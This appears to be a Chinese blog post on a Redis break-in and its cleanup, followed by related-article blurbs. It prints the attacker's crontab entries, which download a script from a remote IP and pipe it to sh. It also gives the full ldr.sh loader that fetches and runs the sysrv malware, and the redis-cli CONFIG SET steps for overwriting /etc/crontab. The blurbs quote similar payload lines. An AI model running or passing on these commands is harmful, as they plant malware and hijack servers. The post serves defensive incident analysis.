【安全】Redis漏洞木马攻击的查杀过程

最新推荐文章于 2024-08-11 18:55:22 发布
最新推荐文章于 2024-08-11 18:55:22 发布
阅读量562 收藏 2
点赞数
分类专栏: 运维经验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39974140/article/details/113999393
版权

Redis漏洞攻击

记录一次Redis漏洞攻击,该攻击通过扫描Redis端口,利用Redis的CONFIG命令和持久化漏洞篡改系统任务计划或公钥文件等方式进行攻击

攻击步骤

  • 扫描服务器端口

  • 尝试Redis连接,弱口令撞库

  • 连接Redis利用CONFIG漏洞篡改系统文件

    • 方式一:攻击程序将任务计划写入Redis数据库的key中,篡改/etc/crontab文件
    # 每分钟检测木马进程,远程执行木马程序,多种方式确保下载成功
# key1.txt
*/1 * * * * root wget -q -O - http://45.145.185.85/ldr.sh | sh


# key2.txt
*/1 * * * * root curl -fsSL http://45.145.185.85/ldr.sh | sh


# key3.txt
*/1 * * * * root cd1 -fsSL http://45.145.185.85/ldr.sh | sh


# key4.txt
*/1 * * * * root wd1 -fsSL http://45.145.185.85/ldr.sh | sh


    # ldr.sh
# 计划任务下载的攻击脚本
cc=http://45.145.185.85
sys=sysrv002

# kill old files
pkill -9 "^network01$"; pkill -9 sysrv001; pkill -9 "^sysrv$"

get() {
    chattr -i $2; rm -rf $2
    # 下载木马程序
    curl -fsSL $1 > $2 || wget -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));" || cd1 -fsSL $1 > $2 || wd1 -q -O - $1 > $2
    chmod +x $2
}

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
    get $cc/sysrv $sys; nohup ./$sys 1>/dev/null 2>&1 &
fi

    # 修改dir配置参数
redis-cli -p redis端口 -a redis密码 CONFIG SET dir /etc/
# 修改rdb文件名称为系统计划任务文件, /etc/crontab
redis-cli -p redis端口 -a redis密码 CONFIG SET dbfilename crontab
# 写入带有计划任务的key
cat key1.txt | redis-cli -p redis端口 -a redis密码 -x set key1
# 执行数据持久化命令,将key中内容写入计划任务
redis-cli -p redis端口 -a redis密码 save|bgsave
    • 方式二:攻击程序将任务计划写入Redis数据库的key中,在/etc/cron.*目录中添加任务计划文件
    • 方式三:篡改~/.ssh/authorized_keys伪造公钥进行免密登录,ssh -i pub.pem root@ipaddr -p 22

病毒查杀

  • top查看高性能占用进程
  • lsof查看进程关联文件
  • ll /proc/pid/exe定位进程文件
  • crontab -l查看计划任务
  • tail /var/log/cron/分析计划任务日志
  • pstree -a查看异常进程
  • /etc/init.d/etc/rc.d/etc/rc.local/etc/profile/etc/inittab/etc/localrc.sysinit等查看是否有可疑开机启动项
  • kill -9 pid杀死可疑进程
  • 清除任务计划
    • crontab -r
    • 清除/etc/cron.*/目录下可疑文件
    • 清除/var/spool/cron/目录下可疑文件
  • $(ps aux | egrep -e "curl|wget" | awk '{print $2}') | kill -9查杀下载程序
  • 删除本地下载的可疑文件
  • 删除可疑开机启动项
  • 再次通过命令查看有无可疑进程产生,并观察一定时间

安全建议

  • 设置较复杂的密码策略
  • 最小限度的开放对外端口
Let's Golang
关注
专栏目录
黑客攻防Redis拉锯战之Root提权
qq_40907977的博客
05-19 1975
转载来源:记一次重大安全事故,黑客攻防Redis拉锯战之Root提权 :http://www.safebase.cn/article-259347-1.html 摘要: 黑客攻击前言要想做一名优秀的程序员,除去个人扎实的基础技能这一不可或缺的因素,还有一个更加不能忽略的潜在意识。那就是——安全防范意识!为什么说,安全防范意识会成为另外一个不可或缺的因素,你且听我慢慢道来。服务器被植入木马linux其实这件事情呢,也就发生在前几天。公司需要部署一套新的 … 前言 要想做一名优秀的程序员,除去个人扎实的基础
红队眼中主要的安全防御能力怎样突破
maoguan121的博客
10-13 5488
蓝队作为实战攻防演练中的攻击方,根据队员的不同攻击能力特 点组织攻击团队。队员们在网络攻击各阶段各司其职,采用适当的攻 击手段和攻击策略对目标系统展开网络攻击,最终获取目标网络和系 统的控制权限和数据,检验目标单位的网络安全防护能力。本部分主要站在蓝队的角度,讲述网络实战攻防演练中攻击阶段 的划分、各阶段主要工作内容、攻击中主要使用的技术手段以及攻方 人员必备的技能,最后通过多个实战案例对攻击手段进行了直观展 示。
【挖矿木马】记一次被挖矿木马攻击过程Redis攻击
热门推荐
ATFWUS的博客
10-26 1万+
不会吧,不会吧,不会2020年了还有人中挖矿木马吧。 0x01.事情经过: 关于这台服务器:我有一台阿里云的服务器(不是学生机)专门拿来做项目测试用的,部署好一些我经常需要用的组件后,平常就没怎么管过。阿里云的检测什么的也都是好的。并且我观察阿里云上的性能和网络层都没有任何问题。 起疑: 有一次我做测试的时候,发现数据库和redis经常连接失败,查看日志发现有大量的用户在连接,并且ip是外国的。因为数据库的密码还给了合作开发的其它人,所以当时没太在意,就简单的做了一些连接限制,重启,就没有管了,.
Redis漏洞攻击植入木马逆向分析
weixin_33717117的博客
03-08 311
阿里云安全 · 2015/11/17 14:24作者:梦特(阿里云云盾安全攻防对抗团队)0x00 背景2015年11月10日,阿里云安全团队捕获到黑客大规模利用Redis漏洞的行为,获取机器root权限,并植入木马进行控制,异地登录来自IP:104.219.xxx.xxx(异地登录会有报警)。由于该漏洞危害严重,因此阿里云安全团队在2015年11月11日,短信电话联系用户修复Redis高危漏洞,2...
Redis漏洞大全~讲解最全的漏洞利用方法
最新发布
weixin_67832625的博客
08-11 1082
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
guijianchouxyz的博客
11-25 934
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
入侵事件
为了忘却的专栏
11-15 1389
1、/etc/crontab文件被修改: REDIS0006þ^@^@^Gcrackit@T SHELL=/bin/sh #* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh ÿÉ6GþÊN 2、shell.sh文件: rm -rf shell.sh wget
Redis漏洞利用,原来大佬都是这样操作的
qq_42982923的博客
05-26 1930
出自:Tide安全团队 1、前言 Redis相关的漏洞存在很长时间了,仍然存在可以利用的情景,本次整理复现下redis相关的漏洞利用,以便以后遇到能够快速建立利用思路。 2、redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和...
记录一下五天前的晚上阿里云服务器redis被入侵的经历
weixin_43938739的博客
05-17 822
我是个普通大二学生,最近做项目需要部署到服务器上,于是我月初在阿里云买了个小服务器,安装好jdk,tomcat,mysql,redis就没管了,第一次弄服务器,没什么经验,当时漏洞我没管,打算有空再搞.redis密码也没设置(太蠢了),端口还是默认的6379对外网开放. 就这么相安无事过了7天吧,那天晚上还在打游戏,看到阿里云发来的短信心头一紧,马上上去看,被入侵了,查了一会,发现是挖矿木马,就是如下这种 https://zhuanlan.zhihu.com/p/54610161 我上来就登录redis f
CTF/AWD实战速胜指南,《AWD特训营》
等风来
10-13 4775
【文末送书】今天推荐一本网安领域优质书籍《AWD特训营》,本文将从其内容与优势出发,详细阐发其对于网安从业人员的重要性与益处。随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,随着知识的指数式增长及政策扶持,安全行业也迎来了春天。为了帮助读者了解AWD竞赛的各项内容以及攻防技术与工具的实际应用,《AWD特训营》应运而生在本书中,作者通过其丰富的参赛经验、长期的攻防对抗技术积累,围绕常见工具、常见加固措施、常见攻击手法、常见漏洞分析等展开“手把手”教学。本书是包含技术解析和技巧的真正的“实战指南”。
网络安全专业名词解释
aixmmmlll的博客
05-16 3909
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
记录Redis和MySQL被扫描注入攻击
qq_44610529的博客
08-05 1323
no 弱密码
谨防利用Redis未授权访问漏洞入侵服务器
weixin_42100387的博客
11-24 1794
谨防利用Redis未授权访问漏洞入侵服务器
阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击
lilyliu2535的博客
12-23 2981
阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击 #背景 阿里云ECS-Centos7.9集群:hadoop202,hadoop203,hadoop204 hadoop202启动redis-server服务 redis.conf配置 #bind 127.0.0.1 protected-mode no #requirepass hadoop202,hadoop203,hadoop204配置了免密 #遭木马入侵,3台机器 CPU占用高 ~/.ssh/authorized_keys遭篡改 cron
昨天才放开redis 6379端口,今天数据就被人清掉了,还留下了backup 的四个key
mikeguo's blog
07-27 4195
先记录一下,以后有机会知道这四条数据什么意思 backup1 */2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh backup2 */2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh backup3 */4 * * * * root curl -fsSL http://oracle
Redis —— 一次错误记录
weixin_51123079的博客
11-27 1924
今天在使用 Redis 存储数据时,发现数据每隔一段时间就会消失,刚开始以为是数据过期时间的问题,使用 QuickRedis 连上 Redis 后,发现数据的过期时间也没有问题,但却发现 数据库0 莫名其妙多出几个 key(backup1、backup2、backup3、backup4),接着我去查看了 Redis 的运行日志,发现 Redis 一直报这个错。,在网上搜索了一番之后,最终确定 Redis 可能遭受了 RDB 方式的入侵攻击
[网络安全-1]Redis远程攻击漏洞分析与防护
shgh_2004的专栏
05-31 866
Redis远程攻击漏洞分析与防护 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥...
linux mkdir命令小结
wd1624348916的博客
09-17 254
mkdir -m -p /a/b/c ----若父文件夹不存在,一同创建父文件夹。 mkdir a 创建文件夹a
Redis 6379 被攻击
RealGUO的博客
03-18 2173
Redis 6379 被攻击 刚开始使用redis,把端口打开了,然后没有设置密码,导致被恶意攻击,这里记录一下。 [root@realguo ~]# redis-cli 127.0.0.1:6379> keys * 1) "backup2" 2) "backup1" 3) "backup4" 4) "backup3" 127.0.0.1:6379> get backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://zzhreceive.anondn
redis 漏洞利用
09-30
redis 漏洞利用可以通过redis-rogue-server工具来实现。...在Linux下,可以利用redis漏洞进行攻击,例如将shell写入到开机启动项或者写webshell到根目录。请注意,漏洞利用的具体思路与Linux下的redis漏洞利用类似。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值